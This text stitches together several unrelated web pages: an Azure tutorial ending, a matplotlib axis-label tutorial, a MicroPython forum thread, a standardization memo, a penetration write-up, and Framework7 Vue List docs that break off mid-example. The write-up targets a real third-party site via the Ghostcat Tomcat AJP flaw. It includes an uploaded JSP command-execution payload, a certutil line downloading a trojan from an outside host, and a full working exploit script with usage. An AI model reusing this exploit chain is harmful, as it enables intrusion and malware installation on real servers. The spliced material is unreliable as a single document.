service/statsd ClusterIP 10.0.47.229 <none> 9125/UDP,9102/TCP 16m
service/webserver ClusterIP 10.0.197.80 <none> 8080/TCP 6s
NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/scheduler 1/1 1 1 13m
deployment.apps/statsd 1/1 1 1 17m
deployment.apps/webserver 1/1 1 1 8m26s
NAME DESIRED CURRENT READY AGE
replicaset.apps/scheduler-7584f4b4b7 1 1 1 13m
replicaset.apps/statsd-d6d5bcd7c 1 1 1 17m
replicaset.apps/webserver-647fdcb7c 1 1 1 8m26s
Note: it doesn’t show the secrets, persistent volumes, persistent volume claims, service accounts, cluster roles, or cluster role bindings that we also created.
In Azure Portal, you can see all the resources within the main resource group:
Figure 11. Cloud Resources
To clean up your environment, just run:
az group delete --name $RESOURCE_GROUP_NAME
Next Steps
As a next step, experiment and take a look at some of the DAG definitions and integrations available!
About the Author
Lena Hall is a Director of Engineering at Microsoft working on Azure, where she focuses on large-scale distributed systems and modern architectures. She is leading a team and technical strategy for product improvement efforts across Big Data services at Microsoft. Lena is the driver behind engineering initiatives and strategies to advance, facilitate and push forward further acceleration of cloud services. Lena has 10 years of experience in solution architecture and software engineering with a focus on distributed cloud programming, real-time system design, highly scalable and performant systems, big data analysis, data science, functional programming, and machine learning. Previously, she was a Senior Software Engineer at Microsoft Research. She co-organizes a conference called ML4ALL, and is often an invited member of program committees for conferences like Kafka Summit, Lambda World, and others. Lena holds a master’s degree in computer science. Twitter: @lenadroid LinkedIn: Lena Hall
|
Displaying X-axis and Y-axis labels
Last time, we covered how to display titles when using subplot.
This time, we will look at how to add X-axis and Y-axis labels when displaying multiple graphs with subplots or subplot.
First, here are the base programs.
The titles added last time have been removed, since they would get in the way of this explanation.
Here is the base program when using subplots.
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
axes= fig.subplots(2)
axes[0].plot(x, y1)
axes[0].plot(x, y2)
axes[1].plot(x, y3)
axes[1].plot(x, y4)
plt.subplots_adjust(hspace=0.5)
plt.show()
Execution result
And here is the base program when using subplot.
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
plt.subplot(2,1,1)
plt.plot(x, y1)
plt.plot(x, y2)
plt.subplot(2,1,2)
plt.plot(x, y3)
plt.plot(x, y4)
plt.subplots_adjust(hspace=0.5)
plt.show()
Execution result
subplots_adjust opens up a little space between the graphs so that the axis labels don't overlap when added.
Displaying axis labels when using subplots
When using subplots, add set_xlabel("X-axis label") to display an X-axis label and set_ylabel("Y-axis label") to display a Y-axis label.
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
axes= fig.subplots(2)
axes[0].plot(x, y1)
axes[0].plot(x, y2)
axes[1].plot(x, y3)
axes[1].plot(x, y4)
axes[0].set_xlabel("X1")
axes[1].set_xlabel("X2")
axes[0].set_ylabel("Y1")
axes[1].set_ylabel("Y2")
plt.subplots_adjust(hspace=0.5)
plt.show()
Execution result
We were able to add X-axis and Y-axis labels to each graph.
Displaying axis labels when using subplot
Next, let's look at how to display X-axis and Y-axis labels when using subplot.
You can add an X-axis label with xlabel("X-axis label") and a Y-axis label with ylabel("Y-axis label"), but as with adding titles, where you add them matters.
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
plt.subplot(2,1,1)
plt.plot(x, y1)
plt.plot(x, y2)
plt.xlabel("X1")
plt.ylabel("Y1")
plt.subplot(2,1,2)
plt.plot(x, y3)
plt.plot(x, y4)
plt.xlabel("X2")
plt.ylabel("Y2")
plt.subplots_adjust(hspace=0.5)
plt.show()
Execution result
How to display X-axis and Y-axis labels common to all graphs
So far, we have covered how to add X-axis and Y-axis labels to each individual graph.
One question that comes up here, though, is whether we can add common X-axis and Y-axis labels for all the graphs.
If we could display common axis labels, the overall figure might look much cleaner in some cases.
So here is how to do it; a more detailed explanation will have to wait for another time.
To add a common label for the X axis, this command will do for now.
fig.text(0.5, 0, 'x common label', ha='center', va='center', fontsize=20)
For the Y axis, it looks like this.
fig.text(0, 0.5, 'y common label', ha='center', va='center', rotation='vertical', fontsize=20)
These commands can be used with both subplots and subplot.
Let's try each of them.
For subplots, it looks like this.
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
axes= fig.subplots(2)
axes[0].plot(x, y1)
axes[0].plot(x, y2)
axes[1].plot(x, y3)
axes[1].plot(x, y4)
plt.subplots_adjust(hspace=0.5)
fig.text(0.5, 0, 'x common label', ha='center', va='center', fontsize=20)
fig.text(0, 0.5, 'y common label', ha='center', va='center', rotation='vertical', fontsize=20)
plt.show()
Execution result
For subplot, it looks like this.
from matplotlib import pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
y1 = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20]
y2 = [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]
y3 = [1, 3, 5, 7, 9, 11, 13, 15, 17, 19]
y4 = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
fig = plt.figure()
plt.subplot(2,1,1)
plt.plot(x, y1)
plt.plot(x, y2)
plt.subplot(2,1,2)
plt.plot(x, y3)
plt.plot(x, y4)
plt.subplots_adjust(hspace=0.5)
fig.text(0.5, 0, 'x common label', ha='center', va='center', fontsize=20)
fig.text(0, 0.5, 'y common label', ha='center', va='center', rotation='vertical', fontsize=20)
plt.show()
Execution result
With this, we can display common axis labels with either subplots or subplot.
Over the past several posts, we have covered how to use subplots and subplot to display multiple graphs: how to create the graphs, how to specify the display range, how to display titles, and how to display axis labels.
What we haven't covered yet is how to display legends, so next time I would like to explain how to display legends.
That's it for this time.
|
bmarkus wrote: On a LoPy v1.0 board with stock firmware
Thanks. Please state the firmware version.
Code:
>>> import gc
>>> gc.collect()
>>> gc.mem_free()
191088
>>>
kfricke wrote:The LoPy firmware does only print a commit hash suffix but no MicroPython release number. So only Pycom knows which MicroPython release we do use there.
Code:
import os
os.uname()
Tiny Core Linux (piCore) developer
HAM radio call: HA5DI (Béla)
Code:
>>> import os
>>> os.uname()
(sysname='LoPy', nodename='LoPy', release='0.9.0.b2', version='f5444c7 on 2016-10-12', machine='LoPy with ESP32')
Code:
>>> import gc
>>> gc.collect()
>>> gc.mem_free()
191216
Yes Frida is my watchdog!
Updated LoPy to 0.9.1.b1 firmware released today. Now free RAM is only
71152 bytes. Also, every execution of gc.mem_free() is decreasing it by 64 bytes.
Tiny Core Linux (piCore) developer
HAM radio call: HA5DI (Béla)
Answer from here: bmarkus wrote: Updated LoPy to 0.9.1.b1 firmware released today. Now free RAM is only 71152 bytes. Also, every execution of gc.mem_free() is decreasing it by 64 bytes. So the free RAM on LoPy (and possibly WiPy 2.0) is a moving target. Hoping to see about 150 KB of free RAM.
71,152 is the expected value for now. We will increase it in future releases, and we should end up with something around 150K. The old value of 191,088 was wrong and that was causing the gc crashes.
Calling gc.mem_free() on the REPL will decrease the value as it creates new objects. As soon as you call gc.collect() the free memory amount will increase again.
Cheers,
Daniel
Added firmware/MicroPython versions for most of the boards in 1st post. I'll later update Pyboard line with the MicroPython version.
Last edited by rcolistete on Wed Nov 02, 2016 8:22 pm, edited 1 time in total.
Teensy 3.6:
Code:
>>> __import__('gc').mem_free()
233920
Code:
>>> del machine
>>> del pins
>>> del pyb
>>> del led
>>> del af
>>> __import__('gc').collect()
>>> __import__('gc').mem_free()
234496
Thanks. Hope to see it in v1.8.6. Constrained RAM is one of the limitations of the ESP8266, so this increase will be very useful.
Roberthh wrote: Today's commit for ESP8266 increased the heap and thus the available RAM by 8k.
1st post updated with free RAM for LoPy and WiPy2, firmware v0.9.3.b2 with 77KB, 8KB more than previous version.
|
When standardizing data in Python, I got confused because the defaults in Numpy, Pandas, and sklearn differ. I'm writing this up as a memo.
What is standardization?
Standardization is one kind of normalization: it sets the mean to 0 and the variance to 1 so that the spread of the data is put on a common scale.
Standardization with Numpy, Pandas, and sklearn
When standardizing, the result changes depending on whether you use the population standard deviation or the unbiased (sample) standard deviation.
Numpy, Pandas, and sklearn use different defaults when computing the standard deviation.
Population standard deviation: Numpy, sklearn
Unbiased standard deviation: Pandas
Library | Population standard deviation | Unbiased standard deviation
Numpy | np.std(data) | np.std(data, ddof=1)
Pandas | df.std(ddof=0) | df.std()
sklearn | (default) | -
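The only difference between the two is the divisor used for the variance (n versus n - 1). A quick self-contained check of what ddof changes, using made-up data:
import numpy as np

data = np.array([1.0, 2.0, 3.0, 4.0])
n = len(data)
var_population = ((data - data.mean()) ** 2).sum() / n        # ddof=0
var_unbiased = ((data - data.mean()) ** 2).sum() / (n - 1)    # ddof=1
print(np.isclose(np.std(data), var_population ** 0.5))        # True
print(np.isclose(np.std(data, ddof=1), var_unbiased ** 0.5))  # True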
Sample code
I checked this using 100 random values.
import numpy as np
import pandas as pd
# Prepare the data
np.random.seed(0)
# for numpy
samples = np.random.rand(100)
# for pandas
df = pd.DataFrame(data=samples,columns=['samples'])
# Standardization with numpy
samples_scaler_np = (samples - samples.mean()) / np.std(samples)
# Standardization with pandas
samples_scaler_pd = (df - df.mean()) / df.std()
print('numpy',samples_scaler_np.mean(),np.std(samples_scaler_np))
print('pandas',samples_scaler_pd.mean(),samples_scaler_pd.std())
numpy -1.2212453270876723e-16 1.0
pandas -1.110223e-16 1.0
Since numpy standardized using the population standard deviation and pandas used the unbiased one, we can confirm that the resulting means differ slightly!
Next, let's standardize with sklearn.
from sklearn.preprocessing import StandardScaler
# Instantiate the scaler
scaler = StandardScaler()
scaler.fit(df)
# Standardize
df_samples_scaler = scaler.transform(df)
df_samples_scaler.mean(),df_samples_scaler.std()
(-1.2212453270876723e-16, 1.0)
Since it standardized with the population standard deviation just like Numpy, the values match exactly.
Finally, let's standardize with pandas using the population standard deviation.
samples_scaler_pd = (df - df.mean()) / df.std(ddof=0)
print('pandas',samples_scaler_pd.mean())
pandas -1.221245e-16
This time Pandas gives the same value as Numpy!
If the standardized values differ between numpy, pandas, and sklearn, it is worth checking which standard deviation, population or unbiased, each of them is using.
|
Preface: On a company project I came across a pyramid-scheme site built on Thinkphp 3.0. After trying injection payloads, I found only a blind SQL injection.
So I went looking for an identical site to grab the source code for auditing.
I found an identical site that exposed the AJP protocol on port 8009 and a Tomcat site on port 8080, which made me think of the Ghostcat vulnerability.
It turned out to have been set up with Jspstudy.
So I tested it with an EXP and found that files could be read. EXP address: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/
With arbitrary file read alone I found I couldn't really do anything substantial, since I didn't know the exact file names.
I tried reading a few backend login-verification files, but found nothing useful.
I searched Baidu for Ghostcat exploitation write-ups, and basically they all stop at arbitrary file read... unbelievable.
The solution came mainly from these two articles: https://www.cnblogs.com/glowing-z/p/12345961.html
The first prerequisite is that the Tomcat site has an upload point.
Upload an image whose content is:
<%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%>
You can replace whoami with
certutil -urlcache -split -f http://xxx.xx.xxx.xx/1.exe
to download a trojan; then simply run the downloaded program name to get the agent to connect back.
Then use the following POC:
#!/usr/bin/env python
# CNVD-2020-10487 Tomcat-Ajp lfi
# by ydhcui
import struct
import io
import base64
# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
def unpack(stream, fmt):
size = struct.calcsize(fmt)
buf = stream.read(size)
return struct.unpack(fmt, buf)
def unpack_string(stream):
size, = unpack(stream, ">h")
if size == -1: # null string
return None
res, = unpack(stream, "%ds" % size)
stream.read(1) # \0
return res
class NotFoundException(Exception):
pass
class AjpBodyRequest(object):
# server == web server, container == servlet
SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
MAX_REQUEST_LENGTH = 8186
def __init__(self, data_stream, data_len, data_direction=None):
self.data_stream = data_stream
self.data_len = data_len
self.data_direction = data_direction
def serialize(self):
data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
if len(data) == 0:
return struct.pack(">bbH", 0x12, 0x34, 0x00)
else:
res = struct.pack(">H", len(data))
res += data
if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
header = struct.pack(">bbH", 0x12, 0x34, len(res))
else:
header = struct.pack(">bbH", 0x41, 0x42, len(res))
return header + res
def send_and_receive(self, socket, stream):
while True:
data = self.serialize()
socket.send(data)
r = AjpResponse.receive(stream)
while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
r = AjpResponse.receive(stream)
if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
break
class AjpForwardRequest(object):
_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(
28)
REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE,
'TRACE': TRACE}
# server == web server, container == servlet
SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
COMMON_HEADERS = ["SC_REQ_ACCEPT",
"SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE",
"SC_REQ_AUTHORIZATION",
"SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE",
"SC_REQ_COOKIE2",
"SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
]
ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert",
"ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
def __init__(self, data_direction=None):
self.prefix_code = 0x02
self.method = None
self.protocol = None
self.req_uri = None
self.remote_addr = None
self.remote_host = None
self.server_name = None
self.server_port = None
self.is_ssl = None
self.num_headers = None
self.request_headers = None
self.attributes = None
self.data_direction = data_direction
def pack_headers(self):
self.num_headers = len(self.request_headers)
res = ""
res = struct.pack(">h", self.num_headers)
for h_name in self.request_headers:
if h_name.startswith("SC_REQ"):
code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
res += struct.pack("BB", 0xA0, code)
else:
res += pack_string(h_name)
res += pack_string(self.request_headers[h_name])
return res
def pack_attributes(self):
res = b""
for attr in self.attributes:
a_name = attr['name']
code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
res += struct.pack("b", code)
if a_name == "req_attribute":
aa_name, a_value = attr['value']
res += pack_string(aa_name)
res += pack_string(a_value)
else:
res += pack_string(attr['value'])
res += struct.pack("B", 0xFF)
return res
def serialize(self):
res = ""
res = struct.pack("bb", self.prefix_code, self.method)
res += pack_string(self.protocol)
res += pack_string(self.req_uri)
res += pack_string(self.remote_addr)
res += pack_string(self.remote_host)
res += pack_string(self.server_name)
res += struct.pack(">h", self.server_port)
res += struct.pack("?", self.is_ssl)
res += self.pack_headers()
res += self.pack_attributes()
if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
header = struct.pack(">bbh", 0x12, 0x34, len(res))
else:
header = struct.pack(">bbh", 0x41, 0x42, len(res))
return header + res
def parse(self, raw_packet):
stream = io.StringIO(raw_packet)
self.magic1, self.magic2, data_len = unpack(stream, "bbH")
self.prefix_code, self.method = unpack(stream, "bb")
self.protocol = unpack_string(stream)
self.req_uri = unpack_string(stream)
self.remote_addr = unpack_string(stream)
self.remote_host = unpack_string(stream)
self.server_name = unpack_string(stream)
self.server_port = unpack(stream, ">h")
self.is_ssl = unpack(stream, "?")
self.num_headers, = unpack(stream, ">H")
self.request_headers = {}
for i in range(self.num_headers):
code, = unpack(stream, ">H")
if code > 0xA000:
h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
else:
h_name = unpack(stream, "%ds" % code)
stream.read(1) # \0
h_value = unpack_string(stream)
self.request_headers[h_name] = h_value
def send_and_receive(self, socket, stream, save_cookies=False):
res = []
i = socket.sendall(self.serialize())
if self.method == AjpForwardRequest.POST:
return res
r = AjpResponse.receive(stream)
assert r.prefix_code == AjpResponse.SEND_HEADERS
res.append(r)
if save_cookies and 'Set-Cookie' in r.response_headers:
self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
# read body chunks and end response packets
while True:
r = AjpResponse.receive(stream)
res.append(r)
if r.prefix_code == AjpResponse.END_RESPONSE:
break
elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
continue
else:
raise NotImplementedError
break
return res
class AjpResponse(object):
_, _, _, SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
COMMON_SEND_HEADERS = [
"Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
"Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
]
def parse(self, stream):
# read headers
self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")
if self.prefix_code == AjpResponse.SEND_HEADERS:
self.parse_send_headers(stream)
elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
self.parse_send_body_chunk(stream)
elif self.prefix_code == AjpResponse.END_RESPONSE:
self.parse_end_response(stream)
elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
self.parse_get_body_chunk(stream)
else:
raise NotImplementedError
def parse_send_headers(self, stream):
self.http_status_code, = unpack(stream, ">H")
self.http_status_msg = unpack_string(stream)
self.num_headers, = unpack(stream, ">H")
self.response_headers = {}
for i in range(self.num_headers):
code, = unpack(stream, ">H")
if code <= 0xA000: # custom header
h_name, = unpack(stream, "%ds" % code)
stream.read(1) # \0
h_value = unpack_string(stream)
else:
h_name = AjpResponse.COMMON_SEND_HEADERS[code - 0xA001]
h_value = unpack_string(stream)
self.response_headers[h_name] = h_value
def parse_send_body_chunk(self, stream):
self.data_length, = unpack(stream, ">H")
self.data = stream.read(self.data_length + 1)
def parse_end_response(self, stream):
self.reuse, = unpack(stream, "b")
def parse_get_body_chunk(self, stream):
rlen, = unpack(stream, ">H")
return rlen
@staticmethod
def receive(stream):
r = AjpResponse()
r.parse(stream)
return r
import socket
def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
fr.method = method
fr.protocol = "HTTP/1.1"
fr.req_uri = req_uri
fr.remote_addr = target_host
fr.remote_host = None
fr.server_name = target_host
fr.server_port = 80
fr.request_headers = {
'SC_REQ_ACCEPT': 'text/html',
'SC_REQ_CONNECTION': 'keep-alive',
'SC_REQ_CONTENT_LENGTH': '0',
'SC_REQ_HOST': target_host,
'SC_REQ_USER_AGENT': 'Mozilla',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.5',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0'
}
fr.is_ssl = False
fr.attributes = []
return fr
class Tomcat(object):
def __init__(self, target_host, target_port):
self.target_host = target_host
self.target_port = target_port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.connect((target_host, target_port))
self.stream = self.socket.makefile("rb", buffering=0)
def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
self.req_uri = req_uri
self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri,
method=AjpForwardRequest.REQUEST_METHODS.get(method))
print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
if user is not None and password is not None:
self.forward_request.request_headers[
'SC_REQ_AUTHORIZATION'] = f'Basic {base64.b64encode(f"{user}:{password}".encode()).decode()}'
for h in headers:
self.forward_request.request_headers[h] = headers[h]
for a in attributes:
self.forward_request.attributes.append(a)
responses = self.forward_request.send_and_receive(self.socket, self.stream)
if len(responses) == 0:
return None, None
snd_hdrs_res = responses[0]
data_res = responses[1:-1]
if len(data_res) == 0:
print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
return snd_hdrs_res, data_res
'''
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
'''
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("target", type=str, help="Hostname or IP to attack")
parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
parser.add_argument('--rce', type=bool, default=False, help="read file(default) or exec command")
args = parser.parse_args()
t = Tomcat(args.target, args.port)
_, data = t.perform_request(f'/hissec{".jsp" if args.rce else ""}', attributes=[
{'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
{'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', args.file]},
{'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
])
print('----------------------------')
print(''.join([d.data.decode('utf_8') for d in data]))
Usage:
python3 2020-10487.py -p 8009 IP -f /pic/202004281702140.jpg --rce 1
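One quirk worth knowing about the POC's command line: --rce is declared with type=bool, and argparse simply calls bool() on the raw string, so any non-empty value switches RCE mode on. A quick check of that behaviour:
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--rce', type=bool, default=False)
print(parser.parse_args(['--rce', '1']).rce)       # True
print(parser.parse_args(['--rce', 'False']).rce)   # also True: bool('False') is truthy
print(parser.parse_args([]).rce)                   # False only when the flag is omitted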
And that's it. After pulling the source code, it turned out to be protected by some xs_run encryption.
|
List Vue Component
List views are versatile and powerful user interface components frequently found in iOS apps. A list view presents data in a scrollable list of multiple rows that may be divided into sections/groups.
List views have many purposes:
To let users navigate through hierarchically structured data
To present an indexed list of items
To display detail information and controls in visually distinct groupings
To present a selectable list of options
List Vue component represents Framework7's List View component.
List Components
There are following components included:
- f7-list - main List View element
- f7-list-group - list group element
List Properties
Prop Type Default Description
<f7-list> properties
inset boolean false Makes list block inset
tablet-inset boolean false Makes block inset on tablets, but not on phones
media-list boolean false Enables Media List
links-list boolean false Enables simplified Links List
simple-list boolean false Enables simplified Simple List
sortable boolean false Enables Sortable List
sortable-enabled boolean false Enables sorting on sortable list
sortable-move-elements boolean When passed, it will overwrite the `sortable.moveElements` global app parameter.
accordion boolean false Enables Accordion List
contacts-list boolean false Enables Contacts List by adding required additional classes for styling
form boolean false Enables <form> tag on list block instead of <div>
form-store-data boolean false Enables form storage for the current form
inline-labels boolean false Enables inline-styled labels for Form Inputs
no-chevron boolean false Removes "chevron" icon on nested list item links
chevron-center boolean false Sets "chevron" icon on nested media list items on center (vertically)
no-hairlines boolean false Removes outer hairlines
no-hairlines-md boolean false Removes outer hairlines for MD theme
no-hairlines-ios boolean false Removes outer hairlines for iOS theme
no-hairlines-between boolean false Removes inner hairlines between items
no-hairlines-between-md boolean false Removes inner hairlines between items for MD theme
no-hairlines-between-ios boolean false Removes inner hairlines between items for iOS theme
tab boolean false Adds additional "tab" class when block should be used as a Tab
tab-active boolean false Adds additional "tab-active" class when block used as a Tab and makes it active tab
virtual-list boolean false Enables Virtual List
virtual-list-params object Object with Virtual List Parameters
<f7-list-group> properties
media-list boolean false Enables Media List for this group
sortable boolean false Enables Sortable List for this group
simple-list boolean false Enables simplified Simple List for this group
List Events
Event Description
<f7-list> events
tab:show Event will be triggered when List Block-Tab becomes visible/active
tab:hide Event will be triggered when List Block-Tab becomes invisible/inactive
submit Event will be triggered on list-form submit when list used as form (with enabled form prop)
<f7-list> Sortable specific events
sortable:enable Event will be triggered when sortable mode is enabled
sortable:disable Event will be triggered when sortable mode is disabled
sortable:sort Event will be triggered after user release currently sorting element in new position. event.detail will contain object with from and to properties with start/new index numbers of sorted list item
<f7-list> Virtual List specific events
virtual:itembeforeinsert Event will be triggered before item will be added to virtual document fragment
virtual:itemsbeforeinsert Event will be triggered after current DOM list will be removed and before new document will be inserted
virtual:itemsafterinsert Event will be triggered after new document fragment with items inserted
virtual:beforeclear Event will be triggered before current DOM list will be removed and replaced with new document fragment
List Slots
List Vue component (<f7-list>) has additional slots for custom elements:
- before-list - element will be inserted at the beginning of the list view, right before the <ul> main list element
- after-list - element will be inserted at the end of the list view, right after the <ul> main list element
- list - element will be inserted inside of the <ul> main list element
Virtual List
For Virtual List usage and examples check the Virtual List Vue Component documentation.
Sortable List
For Sortable List usage and examples check the Sortable Vue Component documentation.
Accordion List
For Accordion List usage and examples check the Accordion Vue Component documentation.
Examples
Simple List
<f7-block-title>Simple List</f7-block-title>
<f7-list simple-list>
<f7-list-item title="Item 1"></f7-list-item>
<f7-list-item title="Item 2"></f7-list-item>
<f7-list-item title="Item 3"></f7-list-item>
</f7-list>
Simple List Links
<f7-block-title>Simple Links List</f7-block-title>
<f7-list>
<f7-list-item title="Link 1" link="#"></f7-list-item>
<f7-list-item title="Link 2" link="#"></f7-list-item>
<f7-list-item title="Link 3" link="#"></f7-list-item>
</f7-list>
Data list, with icons
<f7-block-title>Data list, with icons</f7-block-title>
<f7-list>
<f7-list-item title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="John Doe" badge="5">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item title="Jenna Smith">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
</f7-list>
Links
<f7-block-title>Links</f7-block-title>
<f7-list>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="John Doe" after="Cleaner">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" title="Jenna Smith">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
</f7-list>
Links, Header, Footer
<f7-block-title>Links, Header, Footer</f7-block-title>
<f7-list>
<f7-list-item link="#" header="Name" title="John Doe" after="Edit">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" header="Phone" title="+7 90 111-22-3344" after="Edit">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" header="Email" title="[email protected]" footer="Home" after="Edit">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
<f7-list-item link="#" header="Email" title="[email protected]" footer="Work" after="Edit">
<f7-icon slot="media" icon="demo-list-icon"></f7-icon>
</f7-list-item>
</f7-list>
Links, no icons
<f7-block-title>Links, no icons</f7-block-title>
<f7-list>
<f7-list-item link="#" title="Ivan Petrov"></f7-list-item>
<f7-list-item link="#" title="John Doe"></f7-list-item>
<f7-list-item divider title="Divider Here"></f7-list-item>
<f7-list-item link="#" title="Ivan Petrov"></f7-list-item>
<f7-list-item link="#" title="Jenna Smith"></f7-list-item>
</f7-list>
Grouped with sticky titles
<f7-block-title>Grouped with sticky titles</f7-block-title>
<f7-list>
<f7-list-group>
<f7-list-item title="A" group-title></f7-list-item>
<f7-list-item title="Aaron "></f7-list-item>
<f7-list-item title="Abbie"></f7-list-item>
<f7-list-item title="Adam"></f7-list-item>
</f7-list-group>
<f7-list-group>
<f7-list-item title="B" group-title></f7-list-item>
<f7-list-item title="Bailey"></f7-list-item>
<f7-list-item title="Barclay"></f7-list-item>
<f7-list-item title="Bartolo"></f7-list-item>
</f7-list-group>
<f7-list-group>
<f7-list-item title="C" group-title></f7-list-item>
<f7-list-item title="Caiden"></f7-list-item>
<f7-list-item title="Calvin"></f7-list-item>
<f7-list-item title="Candy"></f7-list-item>
</f7-list-group>
</f7-list>
Mixed and nested
<f7-block-title>Mixed and nested</f7-block-title>
<f7-list>
<f7-list-item link="#" title="Ivan Petrov" after="CEO">
